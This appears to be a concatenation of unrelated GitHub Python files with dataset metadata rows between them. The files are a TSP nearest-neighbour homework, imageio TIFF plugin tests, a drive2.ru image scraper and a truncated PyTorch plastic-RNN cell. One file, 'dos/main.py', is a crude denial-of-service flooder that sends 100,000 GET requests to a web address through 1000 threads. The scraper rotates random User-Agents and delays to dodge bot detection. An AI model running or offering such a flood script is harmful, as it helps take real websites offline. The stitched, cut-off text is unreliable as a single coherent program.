            ##EDGE_WEIGHT_TYPE : EUC_2D (plain Euclidean distance)
            n=len(coordinates1)
            dist = np.zeros((n,n))
            for p in range(n):
                for q in range(p + 1, n):
                    d = math.sqrt((coordinates1[p][0]-coordinates1[q][0])**2 + (coordinates1[p][1]-coordinates1[q][1])**2)
                    dist[p][q] = d
                    dist[q][p] = d
        if EDGE_WEIGHT_TYPE== "ATT":
            #EDGE_WEIGHT_TYPE : ATT
            ###ATT distance (TSPLIB pseudo-Euclidean: sqrt of /10, rounded up)
            n=len(coordinates1)
            dist= np.zeros((n,n))
            for p in range(n):
                for q in range(p + 1, n):
                    d1 = math.sqrt(((coordinates1[p][0]-coordinates1[q][0])**2 + (coordinates1[p][1]-coordinates1[q][1])**2)/10)
                    d2=mpmath.nint(d1)
                    if d2<d1:
                        d=d2+1
                    else:
                        d=d2
                    dist[p][q] = d
                    dist[q][p] = d
        if EDGE_WEIGHT_TYPE== "GEO":
            #EDGE_WEIGHT_TYPE : GEO
            # Coordinates are DDD.MM (degrees.minutes); convert to radians
            # and use the TSPLIB great-circle formula with Earth radius RRR.
            n=len(coordinates1)
            dist = np.zeros((n,n))
            for p in range(n):
                for q in range(p + 1, n):
                    PI = math.pi;
                    deg =mpmath.nint(coordinates1[p][0]);
                    min = coordinates1[p][0] - deg;
                    latitude_p= PI * (deg + 5.0 * min / 3.0 ) / 180.0
                    deg = mpmath.nint( coordinates1[p][1] );
                    min = coordinates1[p][1] - deg;
                    longitude_p = PI * (deg + 5.0 * min / 3.0 ) / 180.0
                    deg = mpmath.nint(coordinates1[q][0]);
                    min = coordinates1[q][0] - deg;
                    latitude_q= PI * (deg + 5.0 * min / 3.0 ) / 180.0
                    deg = mpmath.nint( coordinates1[q][1] );
                    min = coordinates1[q][1] - deg;
                    longitude_q = PI * (deg + 5.0 * min / 3.0 ) / 180.0
                    RRR = 6378.388;
                    q1 = math.cos( longitude_p - longitude_q );
                    q2 = math.cos( latitude_p - latitude_q );
                    q3 = math.cos( latitude_p + latitude_q );
                    d = int(( RRR * math.acos( 0.5*((1.0+q1)*q2 - (1.0-q1)*q3) ) + 1.0))
                    dist[p][q] = d
                    dist[q][p] = d
        return cleaned,cleaned1,dimension,coordinates1,coordinates,EDGE_WEIGHT_TYPE,dist,name
    ######################################################################################
    ##loading the tps document
    file_read=read_tps(path)
    coordinates=file_read[3]
    dimension=file_read[2]
    name=file_read[7]
    dist=file_read[6]
    ###############dist is the matrix which contains the distances between all the pairs of nodes
    EDGE_WEIGHT_TYPE=file_read[5]
    ############################Nearest Neighbor algorithm
    def nearest_neighbour(dist_matrix):
        # Greedy tour construction: always hop to the closest unvisited node.
        n=dist_matrix.shape[0]#the total number of the nodes of the problem
        start=random.choice(list(range(n)))#random selection between all the nodes for the starting node
        not_visited=list(range(n))#at first all the nodes are not visited, so at first I create
        #the not_visited list as a sequence of all nodes of the problem
        path=[start]#the first node of the path is the initial node-start
        not_visited=[ele for ele in not_visited if ele not in path]#taking out from not_visited list
        #the elemnts of the path, beacause they are already visited
        cost=0
        #the repetition continues until the no_visited list is empty(its length is zero),
        #which means that every node of the problem is visited
        while len(not_visited)>0:
            last=path[-1]#last is the last visited node in the path
            next_loc_index=np.argmin(dist_matrix[last][not_visited])
            #the index for the next node that will be visited is computed by finding which node from the
            #nodes that are not visited has the minimum distance from the last visited node.
            #next_loc_index contains the index for that node
            next_loc=not_visited[next_loc_index]#next_loc is the next node that will be visited
            min_dist=dist_matrix[last][next_loc]#minimum distance from the previous visited node to the next
            #viisited node
            path.append(next_loc)#adding the current visited node to the end of the path list
            not_visited=[ele for ele in not_visited if ele not in path]#taking out of the not_visited lsit
            #the node that is just visited and added to the path list
            cost+=min_dist#each time the minimum distance from the previous visited node to the next
            #viisited node is added to cost
        cost+=dist_matrix[path[-1]][start]# at the end the distance from the last visited node to the
        #initial node is added to the cost as the process is cyclical and we should
        #return to the start node
        path.append(start)
        return path, cost,start
    nn_alg=nearest_neighbour(dist)
    path=nn_alg[0]
    cost=nn_alg[1]
    start=nn_alg[2]
    print("The randomly chosen starting node is",start)
    print("\n")
    print("A short rout computed by nearest neighbour heuristic for",name,"TSP problem is:")
    print("\n")
    print(path)
    print("\n")
    print("The total cost of this rout is:",cost)
    return
##################applying nearest_neighbour_for_TPS function to TSP problems
# Each call reads a TSPLIB instance from disk and prints a nearest-neighbour tour.
nearest_neighbour_for_TPS("berlin52.txt")
nearest_neighbour_for_TPS("burma14.txt")
nearest_neighbour_for_TPS("pr144.txt")
nearest_neighbour_for_TPS("a280.txt") | michaelampalkoudi/Master-projects | HW_9_Computational_optimization.py | HW_9_Computational_optimization.py | py | 8,857 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 88,
... |
73157455464 | """ Test tifffile plugin functionality.
"""
import datetime
import io
import warnings
from copy import deepcopy
import numpy as np
import pytest
from conftest import deprecated_test
import imageio.v2 as iio
import imageio.v3 as iio3
from imageio.config import known_extensions, known_plugins
tifffile = pytest.importorskip("tifffile", reason="tifffile is not installed")
@pytest.fixture(scope="module", autouse=True)
def use_tifffile_v3():
    """Restrict imageio's plugin/extension registries to the TIFF plugin
    for this whole test module, restoring the originals afterwards."""
    plugin_name = "TIFF"

    # snapshot the global registries so they can be restored after yield
    all_plugins = known_plugins.copy()
    all_extensions = known_extensions.copy()

    known_plugins.clear()
    known_extensions.clear()

    known_plugins[plugin_name] = all_plugins[plugin_name]
    for extension, configs in all_extensions.items():
        for config in configs:
            for plugin in config.priority:
                if plugin == plugin_name:
                    # deep-copy so rewriting the priorities does not mutate
                    # the saved originals restored below
                    copied_config = deepcopy(config)
                    copied_config.priority = [plugin_name]
                    copied_config.default_priority = [plugin_name]
                    known_extensions[extension] = [copied_config]

    yield

    # restore the global registries for other test modules
    known_plugins.update(all_plugins)
    known_extensions.update(all_extensions)
@deprecated_test
def test_tifffile_format():
    """Both the long and the short name resolve to the TIFF format object."""
    for alias in ("tiff", ".tif"):
        fmt = iio.formats[alias]
        assert fmt.name == "TIFF"
def test_tifffile_reading_writing(test_images, tmp_path):
    """Test reading and saving tiff.

    Covers: single image, multi-page, volumetric data, the legacy
    reader/writer objects, round trips, and metadata read/write.
    """
    im2 = np.ones((10, 10, 3), np.uint8) * 2

    filename1 = tmp_path / "test_tiff.tiff"

    # One image
    iio.imsave(filename1, im2)
    im = iio.imread(filename1)
    ims = iio.mimread(filename1)
    assert im.shape == im2.shape
    assert (im == im2).all()
    assert len(ims) == 1

    # Multiple images
    iio.mimsave(filename1, [im2, im2, im2])
    im = iio.imread(filename1)
    ims = iio.mimread(filename1)
    assert im.shape == im2.shape
    assert (im == im2).all()  # note: this does not imply that the shape match!
    assert len(ims) == 3
    for i in range(3):
        assert ims[i].shape == im2.shape
        assert (ims[i] == im2).all()

    # volumetric data
    iio.volwrite(filename1, np.tile(im2, (3, 1, 1, 1)))
    vol = iio.volread(filename1)
    vols = iio.mvolread(filename1)
    assert vol.shape == (3,) + im2.shape
    assert len(vols) == 1 and vol.shape == vols[0].shape
    for i in range(3):
        assert (vol[i] == im2).all()

    # remote channel-first volume rgb (2, 3, 10, 10)
    filename2 = test_images / "multipage_rgb.tif"
    img = iio.mimread(filename2)
    assert len(img) == 2
    assert img[0].shape == (3, 10, 10)

    # Mixed: legacy writer object with explicit meta data
    W = iio.save(filename1)
    W.set_meta_data({"planarconfig": "SEPARATE"})  # was "planar"
    assert W.format.name == "TIFF"
    W.append_data(im2)
    W.append_data(im2)
    W.close()
    #
    R = iio.read(filename1)
    assert R.format.name == "TIFF"
    ims = list(R)  # == [im for im in R]
    assert (ims[0] == im2).all()
    # meta = R.get_meta_data()
    # assert meta['orientation'] == 'top_left'  # not there in later version

    # Fail: out-of-range page indices must raise
    with pytest.raises(IndexError):
        R.get_data(-1)
    with pytest.raises(IndexError):
        R.get_data(3)

    # Ensure imread + imwrite works round trip
    filename3 = tmp_path / "test_tiff2.tiff"
    im1 = iio.imread(filename1)
    iio.imwrite(filename3, im1)
    im3 = iio.imread(filename3)
    assert im1.ndim == 3
    assert im1.shape == im3.shape
    assert (im1 == im3).all()

    # Ensure imread + imwrite works round trip - volume like
    filename3 = tmp_path / "test_tiff2.tiff"
    im1 = np.stack(iio.mimread(filename1))
    iio.volwrite(filename3, im1)
    im3 = iio.volread(filename3)
    assert im1.ndim == 4
    assert im1.shape == im3.shape
    assert (im1 == im3).all()

    # Read metadata
    md = iio.get_reader(filename2).get_meta_data()
    assert not md["is_imagej"]
    assert md["description"] == "shape=(2,3,10,10)"
    assert md["description1"] == ""
    assert md["datetime"] == datetime.datetime(2015, 5, 9, 9, 8, 29)
    assert md["software"] == "tifffile.py"

    # Write metadata (per-page description, shared software/datetime)
    dt = datetime.datetime(2018, 8, 6, 15, 35, 5)
    with iio.get_writer(filename1, software="testsoftware") as w:
        w.append_data(
            np.zeros((10, 10)), meta={"description": "test desc", "datetime": dt}
        )
        w.append_data(np.zeros((10, 10)), meta={"description": "another desc"})
    with iio.get_reader(filename1) as r:
        for md in r.get_meta_data(), r.get_meta_data(0):
            assert "datetime" in md
            assert md["datetime"] == dt
            assert "software" in md
            assert md["software"] == "testsoftware"
            assert "description" in md
            assert md["description"] == "test desc"

        md = r.get_meta_data(1)
        assert "description" in md
        assert md["description"] == "another desc"
def test_imagej_hyperstack(tmp_path):
    """An ImageJ hyperstack written by tifffile reads back volumetrically."""
    # create artifical hyperstack
    stack_path = tmp_path / "hyperstack.tiff"
    tifffile.imwrite(
        stack_path,
        np.zeros((15, 2, 180, 183), dtype=np.uint8),
        imagej=True,
    )

    # test ImageIO plugin
    volume = iio.volread(stack_path, format="TIFF")
    assert volume.shape == (15, 2, 180, 183)
@pytest.mark.parametrize(
    "dpi,expected_resolution",
    [
        ((0, 1), (0, 1, "INCH")),
        ((0, 12), (0, 12, "INCH")),
        ((100, 200), (100, 200, "INCH")),
        ((0.5, 0.5), (0.5, 0.5, "INCH")),
        (((1, 3), (1, 3)), (1 / 3, 1 / 3, "INCH")),
    ],
)
def test_resolution_metadata(tmp_path, dpi, expected_resolution):
    """Resolution passed at write time round-trips through the metadata."""
    target = tmp_path / "test.tif"
    with iio.get_writer(target) as writer:
        writer.append_data(np.zeros((200, 100), dtype=np.uint8), dict(resolution=dpi))

    result = iio.imread(target)
    assert result.meta["resolution"] == expected_resolution
    # resolution_unit 2 == inch
    assert result.meta["resolution_unit"] == 2
@pytest.mark.parametrize("resolution", [(1, 0), (0, 0)])
def test_invalid_resolution_metadata(tmp_path, resolution):
    """Invalid X/Y resolution tags trigger a RuntimeWarning and are dropped
    from the returned metadata."""
    data = np.zeros((200, 100), dtype=np.uint8)

    tif_path = tmp_path / "test.tif"

    writer = iio.get_writer(tif_path)
    writer.append_data(data)
    writer.close()

    # Overwrite low level metadata the exact way we want it
    # to avoid any re-interpretation of the metadata by imageio
    # For example, it seems that (0, 0) gets rewritten as (0, 1)
    with tifffile.TiffFile(tif_path, mode="r+b") as tif:
        tags = tif.pages[0].tags
        tags["XResolution"].overwrite(resolution)
        tags["YResolution"].overwrite(resolution)

    # Validate with low level library that the invalid metadata is written
    with tifffile.TiffFile(tif_path, mode="rb") as tif:
        tags = tif.pages[0].tags
        assert tags["XResolution"].value == resolution
        assert tags["YResolution"].value == resolution

    # reading the broken file must warn, not crash
    with pytest.warns(RuntimeWarning):
        read_image = iio.imread(tmp_path / "test.tif")

    assert "resolution" not in read_image.meta
def test_read_bytes():
    # regression test for: https://github.com/imageio/imageio/issues/703
    encoded = iio.imwrite("<bytes>", [[0]], format="tiff")
    assert encoded is not None
def test_write_file(tmp_path):
    # regression test for
    # https://github.com/imageio/imageio/issues/810
    blank = np.zeros((32, 32), dtype=np.uint16)
    iio3.imwrite(tmp_path / "v.tif", blank)
def test_stk_volume(test_images):
    # this is a regression test for
    # https://github.com/imageio/imageio/issues/802
    expected = iio.volread(test_images / "movie.stk")
    actual = iio3.imread(test_images / "movie.stk")
    # BUG FIX: np.allclose returns a bool that the original discarded, so
    # this test could never fail. Assert the comparison result.
    assert np.allclose(actual, expected)
def test_tiff_page_writing():
    # regression test for
    # https://github.com/imageio/imageio/issues/849
    # an RGB image must be written as a single TIFF page
    base_image = np.full((256, 256, 3), 42, dtype=np.uint8)
    buffer = io.BytesIO()
    iio3.imwrite(buffer, base_image, extension=".tiff")
    buffer.seek(0)
    with tifffile.TiffFile(buffer) as file:
        assert len(file.pages) == 1
def test_bool_writing():
    # regression test for
    # https://github.com/imageio/imageio/issues/852
    # boolean arrays must survive a write/read round-trip
    expected = (np.arange(255 * 123) % 2 == 0).reshape((255, 123))
    img_bytes = iio3.imwrite("<bytes>", expected, extension=".tiff")
    actual = iio.imread(img_bytes)
    assert np.allclose(actual, expected)
def test_roundtrip(tmp_path):
    # regression test for
    # https://github.com/imageio/imageio/issues/854
    # a uint32 stack must keep its (pages, H, W) shape through write + read
    iio3.imwrite(tmp_path / "test.tiff", np.ones((10, 64, 64), "u4"))
    actual = iio3.imread(tmp_path / "test.tiff")
    assert actual.shape == (10, 64, 64)
def test_volume_roudtrip(tmp_path):
    # regression test for
    # https://github.com/imageio/imageio/issues/818
    # (function name keeps its historical "roudtrip" typo to avoid renaming)
    expected_volume = np.full((23, 123, 456, 3), 42, dtype=np.uint8)
    iio3.imwrite(tmp_path / "volume.tiff", expected_volume)

    # assert that the file indeed contains a volume
    with tifffile.TiffFile(tmp_path / "volume.tiff") as file:
        assert file.series[0].shape == (23, 123, 456, 3)
        assert len(file.series) == 1

    actual_volume = iio3.imread(tmp_path / "volume.tiff")
    assert np.allclose(actual_volume, expected_volume)
def test_multipage_read(tmp_path):
    # regression test for
    # https://github.com/imageio/imageio/issues/818
    # this creates a TIFF with two flat images (non-volumetric)
    # Note: our plugin currently can't do this, but tifffile itself can
    expected_flat = np.full((35, 73, 3), 114, dtype=np.uint8)
    with tifffile.TiffWriter(tmp_path / "flat.tiff") as file:
        file.write(expected_flat)
        file.write(expected_flat)

    # imread returns a flat image; imiter must yield both pages in order
    actual_flat = iio3.imread(tmp_path / "flat.tiff")
    assert np.allclose(actual_flat, expected_flat)

    for idx, page in enumerate(iio3.imiter(tmp_path / "flat.tiff")):
        assert np.allclose(page, expected_flat)
    assert idx == 1
def test_multiple_ndimages(tmp_path):
    # A TIFF containing series of different dimensionality/shape must be
    # addressable per-series via index= and iterable in file order.
    volumetric = np.full((4, 255, 255, 3), 114, dtype=np.uint8)
    flat = np.full((255, 255, 3), 114, dtype=np.uint8)
    different_shape = np.full((120, 73, 3), 114, dtype=np.uint8)
    with tifffile.TiffWriter(tmp_path / "nightmare.tiff") as file:
        file.write(volumetric)
        file.write(flat)
        file.write(different_shape)

    # imread will read the image at the respective index
    assert iio3.imread(tmp_path / "nightmare.tiff", index=0).shape == (4, 255, 255, 3)
    assert iio3.imread(tmp_path / "nightmare.tiff", index=1).shape == (255, 255, 3)
    assert iio3.imread(tmp_path / "nightmare.tiff", index=2).shape == (120, 73, 3)

    # imiter will yield the three images in order
    shapes = [(4, 255, 255, 3), (255, 255, 3), (120, 73, 3)]
    for image, shape in zip(iio3.imiter(tmp_path / "nightmare.tiff"), shapes):
        assert image.shape == shape
def test_compression(tmp_path):
    """Compression requested via the legacy or modern metadata key is applied."""
    img = np.ones((128, 128))

    # legacy "compress" key (deprecation warning suppressed)
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        iio.imwrite(tmp_path / "test.tiff", img, metadata={"compress": 5})
    with tifffile.TiffFile(tmp_path / "test.tiff") as file:
        # this should be tifffile.COMPRESSION.ADOBE_DEFLATE
        # but that isn't supported by tifffile on python 3.7
        assert file.pages[0].compression == 8

    # modern "compression" key
    iio.imwrite(tmp_path / "test.tiff", img, metadata={"compression": "zlib"})
    with tifffile.TiffFile(tmp_path / "test.tiff") as file:
        # this should be tifffile.COMPRESSION.ADOBE_DEFLATE
        # but that isn't supported by tifffile on python 3.7
        assert file.pages[0].compression == 8

    # no compression requested -> stored uncompressed
    # CLEANUP: stray debug print("") calls removed.
    iio.imwrite(
        tmp_path / "test.tiff",
        img,
    )
    with tifffile.TiffFile(tmp_path / "test.tiff") as file:
        # this should be tifffile.COMPRESSION.NONE
        # but that isn't supported by tifffile on python 3.7
        assert file.pages[0].compression == 1
| imageio/imageio | tests/test_tifffile.py | test_tifffile.py | py | 11,873 | python | en | code | 1,339 | github-code | 36 | [
{
"api_name": "pytest.importorskip",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "imageio.config.known_plugins.copy",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "imageio.config.known_plugins",
"line_number": 23,
"usage_type": "name"
},
{
... |
43328947226 | from bs4 import BeautifulSoup
#from requests import Session as R
import requests as R
import time
import random
import os
import json
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
class DATA(object):
    """Collects image paths and per-image annotation rows from a dataset folder."""

    def __init__(self):
        # key -> list of annotation rows (or [path] entries from parseIMG)
        self.file = {}
        # path of the annotation .csv found by parseIMG (empty until found)
        self.csv = ""

    def parseCSV(self):
        """Merge rows of self.csv into self.file.

        Each line looks like "key;label:a/b/c" or "key;no_matching_images";
        lines whose key is not already present in self.file are skipped.
        """
        with open(self.csv, 'r') as handle:
            for raw_line in handle.readlines():
                fields = raw_line.split('\n')[0].split(';')
                try:
                    # IDIOM FIX: renamed from `list`, which shadowed the builtin.
                    records = self.file[fields[0]]
                except KeyError:
                    continue  # unknown key -> ignore the row
                if fields[1] != 'no_matching_images':
                    # "label:1/2/3" -> [1, 2, 3]
                    parsed = [int(i) for i in fields[1].split(':')[1].split('/')]
                    records.append(parsed)
                else:
                    records.append([])
                self.file[fields[0]] = records

    def parseIMG(self, dir_name, tp):
        """Walk data/<dir_name>: register every .jpg/.png in self.file and
        remember the annotation .csv path.

        tp == 4 keys entries by the file stem; anything else keys by full path.
        """
        path = "data/" + dir_name
        print("PARSING", path)
        valid_images = [".jpg", ".png"]
        for root, _dirs, names in os.walk(path):
            for name in names:
                if valid_images[0] in name or valid_images[1] in name:
                    if int(tp) == 4:
                        self.file[name.split(".")[0]] = [os.path.join(root, name)]
                    else:
                        self.file[os.path.join(root, name)] = [os.path.join(root, name)]
                if ".csv" in name:
                    self.csv = os.path.join(root, name)
path_img = "data_img/"


def create_dir(x):
    """Create data_img/<a>/<b>/<c> for a drive2 link path and return it.

    `x` is a slash-separated link such as "/r/<brand>/<model>/<id>"; path
    components 2..4 name the directory chain.
    """
    parts = x.split("/")
    target = path_img + parts[2] + "/" + parts[3] + "/" + parts[4]
    # IDIOM FIX: os.makedirs replaces the three mkdir/except-FileExistsError
    # blocks and is also more robust: it creates the data_img root if missing
    # (the original raised FileNotFoundError in that case).
    os.makedirs(target, exist_ok=True)
    return target
#os.mkdir(car_info.text)
#---------------------------------------_>
# Thin wrapper around a requests.Session that randomises the User-Agent on
# every request. Tor SOCKS-proxy wiring is present but disabled.
class RequestLib():
    def __init__(self):
        self.session = R.session()
        self.session.proxies = {}
        #self.session.proxies['http'] = 'socks5://127.0.0.1:9050'
        #self.session.proxies['https'] = 'socks5://127.0.0.1:9050'
        # Browser-like default headers; User-agent is re-randomised per GET.
        self.headers = {}
        self.headers['User-agent'] = UserAgent().random
        self.headers['Accept-Language'] = "en,en-US;q=0,5"
        self.headers['Content-Type'] = "application/x-www-form-urlencoded"
        self.headers['Connection'] = "keep-alive"
        self.headers['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"

    def get(self, http):
        """GET the URL with a freshly randomised User-Agent; returns the Response."""
        self.headers['User-agent'] = UserAgent().random
        get_page = self.session.get(http, headers=self.headers)#, timeout=(10, 10))
        return get_page#.text
Sess = RequestLib()
#---------------------------------------_>
def my_proxy(PROXY_HOST,PROXY_PORT):
    """Build a headless Firefox webdriver.

    NOTE(review): the SOCKS-proxy preferences are commented out, so the
    PROXY_HOST/PROXY_PORT arguments are currently ignored — confirm whether
    Tor routing is still wanted.
    """
    fp = webdriver.FirefoxProfile()
    #fp.set_preference("network.proxy.type", 1)
    #fp.set_preference("network.proxy.socks",PROXY_HOST)
    #fp.set_preference("network.proxy.socks_port",int(PROXY_PORT))
    fp.update_preferences()
    options = Options()
    #options.add_argument('headless')
    options.add_argument("--headless")
    #options.headless = True
    return webdriver.Firefox(options=options, firefox_profile=fp)
def scroll():
    """Scroll the module-global `proxy` browser window toward the bottom in
    100px steps so lazily-loaded content gets fetched."""
    last_height = proxy.execute_script("return document.body.scrollHeight")
    w = last_height//100
    igg = 100
    for i in range(w):
        proxy.execute_script("window.scrollTo(0, {})".format(igg))
        time.sleep(0.3)  # give the page a moment to load each chunk
        igg += 100
proxy = my_proxy("127.0.0.1", 9050)
path = "data"
def func_(htt, dir_save):
    """Open a drive2 car page in the headless browser, scroll it fully, then
    save its info text and slideshow images into dir_save."""
    proxy.get(htt)
    try:
        scroll()
    finally:
        pass

    def PP():
        # Parse the fully-scrolled page out of the live browser session.
        html = proxy.page_source
        soup = BeautifulSoup(html)
        car_info = soup.find("span", {"class": "u-break-word"})
        car_rate = soup.find("span", {"class": "r-button-unstyled c-round-num-block"})
        car_rate = car_rate.find("strong")
        user_info = soup.find("div", {"class": "c-user-card__info"})
        user_link = soup.find("a", {"class": "c-link c-link--color00 c-username c-username--wrap"})

        # Dump car/user metadata next to the images.
        f_inf = open(dir_save + "/info.txt", "w")
        f_inf.write(car_info.text + ";" + car_rate.text + "\n")
        f_inf.write(user_link["href"] + "\n")
        f_inf.write(user_info.text + "\n")
        f_inf.close()

        cl = soup.find_all('div', {"class": "c-slideshow__hd"})
        for K in cl:
            Kcl = K.find("img")
            # BUG FIX: the original fetched `htt` (the page URL) again, so the
            # image-named files written below contained HTML, not image bytes.
            # Fetch the image's own src, as the commented-out
            # R.get(Kcl["src"], ...) call originally intended.
            response = Sess.get(Kcl["src"])
            print(response)
            if response.status_code == 200:
                with open(dir_save + "/" + Kcl["src"].split("/")[-1], 'wb') as fli:
                    fli.write(response.content)

        # Random delay so the crawl looks less like a bot.
        SEC = random.choice([2, 3, 4, 5, 3, 1, 1.1, 1.5, 0.7])
        time.sleep(SEC)

    PP()
# Walk every saved link-list file under `path` and scrape the whitelisted brands.
dirn = os.walk(path)
ls = ["bmw", "mercedes", "audi", "opel", "landrover", "mitsubishi",
      "nissan", "subaru", "toyota", "porsche", "ferrari", "lamborghini"]
for walk_entry in dirn:
    for list_name in walk_entry[2]:
        list_path = os.path.join(walk_entry[0], list_name)
        with open(list_path, "r") as link_file:
            link_lines = link_file.readlines()
        for raw_link in link_lines:
            rel_link = raw_link.split("\n")[0]
            htt = "https://www.drive2.ru" + rel_link
            dir_save = create_dir(rel_link)
            # path component 2 of the link is the brand name
            if raw_link.split("/")[2] in ls:
                print(htt, raw_link.split("/")[-2])
                func_(htt, dir_save)
| naturalkind/simpleparsing | build_parse_drive2/dr4_1.py | dr4_1.py | py | 9,278 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.walk",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 5... |
1952962326 | from multiprocessing import Process,Queue,Pipe
from slave import serialize
import time
def timer(*args, f=None):
    """Call f(*args) once and return the elapsed wall-clock time in seconds."""
    start = time.time()
    f(*args)
    return time.time() - start
# Build a ~20 MB string and time how long the child process takes to
# serialize it and reply over the pipe.
big_str = ' '.join(['abcdeftghijklmnopq\n' for y in range(1000000)]) + ' '
print(len(big_str))

parent_conn,child_conn = Pipe()
p = Process(target=serialize, args=(child_conn,big_str))

def run(proc, conn):
    # Start the child and block until it sends its result back.
    # NOTE(review): the process is never join()ed here — confirm cleanup is
    # handled elsewhere (e.g. inside slave.serialize).
    proc.start()
    conn.recv()

print(timer(p, parent_conn, f=run))
| brokenpath/generator | master.py | master.py | py | 484 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pipe",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
... |
36189547346 | from concurrent.futures.thread import ThreadPoolExecutor
import requests
# url = "http://www.eversunshine.cn/"
# url = "https://static-4c89007f-af34-418a-909e-be456bf03b70.bspapp.com/#/"
# url = "https://www.baidu.com/"
def DOS():
    """Fire a single GET at the module-level target `url` and print the body.

    NOTE(review): every `url = ...` assignment above is commented out, so
    calling this currently raises NameError — define the intended target.
    """
    # resp = requests.get(url, timeout=3)
    # print(resp.text)
    # print(data)
    resp = requests.get(url)
    print(resp.text)
if __name__ == "__main__":
    # Flood the target with 100k GET requests across a 1000-thread pool.
    with ThreadPoolExecutor(1000) as t:
        for i in range(100000):
            t.submit(DOS)
| wuheyouzi/code | PycharmProjects/dos/main.py | main.py | py | 495 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.thread.ThreadPoolExecutor",
"line_number": 19,
"usage_type": "call"
}
] |
12780519052 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.modules import RNNCell, SequenceWise, ConvLayer
def im2col(x, K, P):
    """Unfold x of shape (N, C, H, W) into per-position patch rows.

    Returns a (N*H*W, C*K*K) tensor; assumes padding P keeps the number of
    sliding positions equal to H*W (i.e. P = K // 2 with stride 1, odd K).
    """
    batch, channels, height, width = x.shape
    patches = F.unfold(x, kernel_size=K, padding=P)   # (N, C*K*K, H*W)
    patches = patches.permute(0, 2, 1)                # (N, H*W, C*K*K)
    return patches.reshape(batch * height * width, channels * K ** 2)
def outer_conv(xcol, y):
    """Per-position outer product between patch rows and output vectors.

    xcol is (L, CK2) from im2col; y is (N, C, H, W) with L = N*H*W.
    Returns a (L, CK2, C) tensor.
    """
    flat_out = hide_spatial(y)        # (L, C)
    lhs = xcol.unsqueeze(2)           # (L, CK2, 1)
    rhs = flat_out.unsqueeze(1)       # (L, 1, C)
    return torch.bmm(lhs, rhs)        # (L, CK2, C)
def local_convolution(self, xcol, w, out_shape):
    # Batched matmul of patch rows (L, CK2) against per-position kernels w.
    # NOTE(review): this is a free function yet takes a stray `self` first
    # argument, and the unpacked shape values below are unused — looks like
    # a method copied out of a class; confirm intent before relying on it.
    L, CK2 = xcol.shape
    N, C, H, W = out_shape
    y = torch.bmm(xcol.unsqueeze(1), w)
    return y
def show_spatial(x, N, H, W, C):
    """Inverse of hide_spatial: reshape flat (N*H*W, C) rows back to (N, C, H, W)."""
    spatial_last = x.reshape(N, H, W, C)
    return spatial_last.permute(0, 3, 1, 2).contiguous()
def hide_spatial(x):
    """Flatten (N, C, H, W) into per-position rows of shape (N*H*W, C)."""
    n, c, h, w = x.shape
    channels_last = x.permute(0, 2, 3, 1)
    return channels_last.reshape(n * h * w, c)
def convolutions(x, weights, padding=1):
    """Convolve each sample x[i] with its own filter bank weights[i],
    then concatenate the per-sample results along the batch dimension."""
    per_sample = []
    for i in range(len(x)):
        per_sample.append(F.conv2d(x[i:i + 1], weights[i], bias=None, padding=padding))
    return torch.cat(per_sample)
class ConvPlastic(RNNCell):
    r"""ConvPlasticCell module, applies sequential part of ConvRNNPlastic.
    a convolutional derivation of https://arxiv.org/pdf/1804.02464.pdf
    the module learns weights by applying hebbian rule convolutionally.
    V1: the plastic weights are accumulated accross the receptive field (only global convolutions)
    """
    def __init__(self, in_channels, hidden_dim, kernel_size=3, hard=False, local=False):
        # NOTE(review): `local` is accepted but never used — confirm whether
        # per-position (local) plasticity was meant to be wired in here.
        super(ConvPlastic, self).__init__(hard)
        self.hidden_dim = hidden_dim
        # Strided conv embeds each time step into the hidden feature space
        # (SequenceWise applies it across the time dimension); halves H and W.
        self.conv_x2h = SequenceWise(ConvLayer(in_channels, hidden_dim,
                                               kernel_size=5,
                                               stride=2,
                                               dilation=1,
                                               padding=2,
                                               activation='Identity'))
        self.K = kernel_size       # recurrent kernel size
        self.P = kernel_size//2    # "same" padding for the recurrent conv
        self.C = hidden_dim
        self.CK2 = self.C * self.K**2  # flattened patch length C*K*K
        # fixed part of weights
        self.fixed_weights = nn.Parameter(.01 * torch.randn(self.C, self.C, self.K, self.K).float())
        # fixed modulation of plastic weights
        self.alpha = nn.Parameter(.01 * torch.randn(self.C, self.C, self.K, self.K).float())
        # learning rate of the Hebbian trace
        self.eta = nn.Parameter( .01 * torch.ones(1).float() )
        self.reset()

    def forward(self, xi):
        """Run the cell over a (T, N, C_in, H, W) sequence; returns the
        hidden states stacked over time."""
        xi = self.conv_x2h(xi)
        xiseq = xi.split(1, 0)  # t,n,c,h,w

        T, N, C, H, W = xi.shape
        L = N*H*W

        if self.prev_h is not None:
            # Carry state across calls, but cut the autograd graph so
            # backprop does not reach into previous sequences.
            self.hebb = self.hebb.detach()
            self.prev_h = self.prev_h.detach()
        else:
            self.prev_h = torch.zeros(N, C, H, W).float().to(xi)
